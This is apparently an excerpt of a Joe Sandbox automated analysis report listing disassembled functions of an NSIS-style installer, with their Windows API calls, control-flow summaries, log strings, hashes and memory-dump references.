                                                                                                      • API String ID: 3376005127-0
                                                                                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                      Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2568930968-0
                                                                                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                      Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                      • String ID: %ReadyAdvised%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                      • API String ID: 247603264-3806224681
                                                                                                      • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                      • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                      • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                      • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                      Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      Strings
                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                      • API String ID: 3156913733-2180253247
                                                                                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                      Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileNameTempTick
                                                                                                      • String ID: nsa
                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                      Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                      • String ID: HideWindow
                                                                                                      • API String ID: 1249568736-780306582
                                                                                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                      Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                      Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesCreate
                                                                                                      • String ID:
                                                                                                      • API String ID: 415043291-0
                                                                                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                      Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                      Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                      Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                      • String ID:
                                                                                                      • API String ID: 4115351271-0
                                                                                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                      Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                      Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
